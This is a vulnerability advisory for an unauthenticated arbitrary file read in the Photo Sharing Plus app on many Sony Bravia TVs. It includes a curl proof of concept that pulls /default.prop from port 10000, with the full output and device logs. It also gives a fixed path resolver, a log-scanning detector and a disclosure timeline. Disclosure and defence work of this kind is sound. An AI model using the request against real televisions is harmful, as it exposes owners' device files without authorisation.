Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability

23 April 2019

 

CVE

 

CVE-2019-10886

 

XID

 

XL-19-002

 

CVSS SCORE

 

6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

 

AFFECTED VENDORS

 

Sony

 

AFFECTED SYSTEMS

Sony Smart TVs (non-exhaustive list):

KDL-50W800C, KDL-50W805C, KDL-50W807C, KDL-50W809C, KDL-50W820C, KDL-55W800C, KDL-55W805C, KDL-65W850C, KDL-65W855C, KDL-65W857C, KDL-75W850C, KDL-75W855C, XBR-43X830C, XBR-49X800C, XBR-49X830C, XBR-49X835C, XBR-49X837C, XBR-49X839C, XBR-55X805C, XBR-55X807C, XBR-55X809C, XBR-55X810C, XBR-55X850C, XBR-55X855C, XBR-55X857C, XBR-65X800C, XBR-65X805C, XBR-65X807C, XBR-65X809C, XBR-65X810C, XBR-65X850C, XBR-65X855C, XBR-65X857C, XBR-75X850C, XBR-75X855C, XBR-55X900C, XBR-55X905C, XBR-55X907C, XBR-65X900C, XBR-65X905C, XBR-65X907C, XBR-65X930C, XBR-75X910C, XBR-75X940C, XBR-75X945C, XBR-43X800D, XBR-49X800D, XBR-49X835D, XBR-55X850D, XBR-55X855D, XBR-55X857D, XBR-65X850D, XBR-65X855D, XBR-65X857D, XBR-75X850D, XBR-75X855D, XBR-75X857D, XBR-85X850D, XBR-85X855D, XBR-85X857D, XBR-55X930D, XBR-65X930D, XBR-65X935D, XBR-65X937D, XBR-75X940D, XBR-100Z9D, XBR-49X700D, XBR-55X700D, XBR-65X750D, XBR-65Z9D, XBR-75Z9D, XBR-43X800E, XBR-49X800E, XBR-49X900E, XBR-55A1E, XBR-55X800E, XBR-55X806E, XBR-55X900E, XBR-55X930E, XBR-65A1E, XBR-65X850E, XBR-65X900E, XBR-65X930E, XBR-75X850E, XBR-75X900E, XBR-75X940E, XBR-77A1E

 

VULNERABILITY SUMMARY

The “Photo Sharing Plus” application on the Smart TV is used to upload photos from a smartphone to the TV so that they can be displayed on the television screen. When the application is launched, it turns the TV into a Wi-Fi access point and displays the Wi-Fi password, which allows a smartphone to authenticate and share media content with the Sony Smart TV.

This vulnerability allows an attacker to read arbitrary files located on the file-system of the TV without authentication, including valuable files.

 

TECHNICAL DETAILS

This vulnerability allows an attacker to retrieve internal files located inside the TV file system, without authentication.

By default, images used by the Photo Sharing Plus application are stored inside ‘/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/’. The application starts an access point on the television, and an HTTP daemon listens on a TCP port on the newly created WLAN.

Furthermore, this daemon also listens on the LAN side of the television, so an image can be retrieved from the LAN using this URL:

http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG

Browsing to the web address http://[ip_tv]:10000/contentshare/image/ allows access to the root directory of the television running Android.
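
The device logs in the proof of concept show the daemon splitting the request URI into a load type (/contentshare/image) and using the remainder as the local file path. The following sketch is an added example, not Sony's code: it models that mapping next to a resolver confined to the image directory. The function names are hypothetical and the check is lexical only.

```python
import posixpath
from urllib.parse import unquote

# Both values are taken from the advisory; the function names are hypothetical.
LOAD_TYPE = "/contentshare/image"
IMAGE_DIR = "/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP"


def resolve_as_logged(uri):
    """Mapping implied by the device logs: everything after the load type
    is used as an absolute path on the TV, with no confinement."""
    if not uri.startswith(LOAD_TYPE + "/"):
        return None
    return uri[len(LOAD_TYPE):]


def resolve_confined(uri):
    """Hardened variant: decode once, normalise, then require the result to
    stay inside IMAGE_DIR. Returns None for anything else (answer 404)."""
    if not uri.startswith(LOAD_TYPE + "/"):
        return None
    path = unquote(uri[len(LOAD_TYPE):])
    if "\x00" in path:
        return None
    # Lexical normalisation collapses "..", "." and duplicate slashes.
    # On a device, also resolve symlinks (e.g. File.getCanonicalPath in Java)
    # before comparing.
    path = posixpath.normpath("/" + path.lstrip("/"))
    if posixpath.commonpath([path, IMAGE_DIR]) != IMAGE_DIR:
        return None
    if path == IMAGE_DIR:
        return None  # the directory itself is not a servable file
    return path
```

Comparing whole path components with commonpath, rather than a string prefix, also rejects sibling directories whose names merely start with the image directory's name.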

 

PROOF OF CONCEPT

 

By exploiting this vulnerability, ‘/default.prop’ (containing Android properties) can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop

root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop
*   Trying 192.168.1.102...
* TCP_NODELAY set
* Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)
> GET /contentshare/image/default.prop HTTP/1.1
> Host: 192.168.1.102:10000
> User-Agent: curl/7.58.0
> Accept: */*
< HTTP/1.1 200 OK
< Connection: close
< Content-Length: 591
< Content-Type: application/octet-stream
#
# ADDITIONAL_DEFAULT_PROPERTIES
#
ro.secure=1
security.perf_harden=1
ro.allow.mock.location=0
ro.debuggable=0
ro.zygote=zygote32
dalvik.vm.image-dex2oat-Xms=64m
dalvik.vm.image-dex2oat-Xmx=64m
dalvik.vm.dex2oat-Xms=64m
dalvik.vm.dex2oat-Xmx=512m
ro.dalvik.vm.native.bridge=0
debug.atrace.tags.enableflags=0
#
# BOOTIMAGE_BUILD_PROPERTIES
#
ro.bootimage.build.date=2016年 11月 14日 月曜日 15:34:56 JST
ro.bootimage.build.date.utc=1479105296
ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys
persist.sys.usb.config=none
* Closing connection 0

 

 

Device logs confirm the ‘/default.prop’ file has been delivered over HTTP:

01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed
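
The PhotoShareApp log lines above are enough to detect this class of read after the fact. The following is an added example, not part of the original advisory: it scans logcat text in the layout quoted above and reports every completed response whose localResPath lies outside the application's image directory. The function names and the two benign sample lines are constructed for illustration.

```python
import posixpath
import re

# Directory the advisory names as the application's image store.
IMAGE_DIR = "/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP"

# logcat "threadtime" layout as quoted in the advisory:
# MM-DD HH:MM:SS.mmm PID TID LEVEL TAG: [tid][e]message
LINE_RE = re.compile(
    r"^(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})\s+\d+\s+(?P<tid>\d+)\s+[VDIWEF]\s+"
    r"PhotoShareApp: \[\d+\]\[e\](?P<msg>.*)$"
)

# First four lines are adapted from the advisory; the last two are constructed.
SAMPLE_LOG = """\
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed
01-01 07:47:10.100 5539 18790 D PhotoShareApp: [18790][e]localResPath: /data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG
01-01 07:47:10.101 5539 18790 D PhotoShareApp: [18790][e]Write to response completed
"""


def outside_image_dir(path):
    norm = posixpath.normpath("/" + path.lstrip("/"))
    return posixpath.commonpath([norm, IMAGE_DIR]) != IMAGE_DIR


def find_out_of_scope_reads(log_text):
    """Return (timestamp, path, bytes_served) for each served file whose
    localResPath lies outside IMAGE_DIR. State is tracked per thread id."""
    pending, hits = {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        tid, msg = m["tid"], m["msg"]
        if msg.startswith("localResPath:"):
            pending[tid] = [m["ts"], msg.split(":", 1)[1].strip(), None]
        elif msg.startswith("fileSize:") and tid in pending:
            pending[tid][2] = int(msg.split(":", 1)[1])
        elif msg.startswith("Write to response completed") and tid in pending:
            ts, path, size = pending.pop(tid)
            if outside_image_dir(path):
                hits.append((ts, path, size))
    return hits
```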

TIMELINE

03/10/2018 – Vulnerabilities found

10/10/2018 - Report to Sony Bug bounty program through HackerOne

12/10/2018 - Confirmation of the reception of the bug report

15/10/2018 – xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C})

29/10/2018 - Sony confirms the vulnerabilities

09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019

29/11/2018 – xen1thLabs sent the slides to Sony prior to the xen1thLabs talk at HiTB Dubai 2018, as agreed with Sony

14/01/2019 - Updates requested from xen1thLabs

15/01/2019 - Sony informs xen1thLabs that they are working on patches

27/01/2019 - Updates requested from xen1thLabs

07/03/2019 - Updates requested from xen1thLabs

15/03/2019 – Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don’t know when they will be ready “maybe in a couple of months”

17/03/2019 – Updates requested from Sony to understand and to publish a security advisory. xen1thLabs also requests a CVE officially

20/03/2019 – xen1thLabs asks for an acceptable timeline

21/03/2019 – xen1thLabs sent an email to Secure@Sony.com, citing the lack of proper communication from Sony and informing Sony that, in order to protect their customers, xen1thLabs needs to publish a security advisory

21/03/2019 – Automatic response: Secure@Sony.com is no longer in use

22/03/2019 – Sony is working on the patches and confirms the 12th April

26/03/2019 – xen1thLabs confirms the release date of the advisory and asks for a CVE

01/04/2019 – Sony confirms the vulnerabilities affect a range of models and “Sony plans to terminate Photo Sharing Plus service for all of the models, and that completion date is scheduled for April 12th, 2019.”

23/04/2019 – Public disclosure

 

SOLUTION

Apply patches provided by Sony

Firmware update to v6.5830 from 01-22-2019 (including security patches?)

https://www.sony.com/electronics/support/downloads/00015771

 

Firmware update to v6.5830 from 01-22-2019 (not including security patches)

https://www.sony.com/electronics/support/downloads/00015770

 

End of Photo Sharing Plus 11/22/2018

https://www.sony.com/electronics/support/articles/00204331

 

CREDIT

 

xen1thLabs - Telecom Lab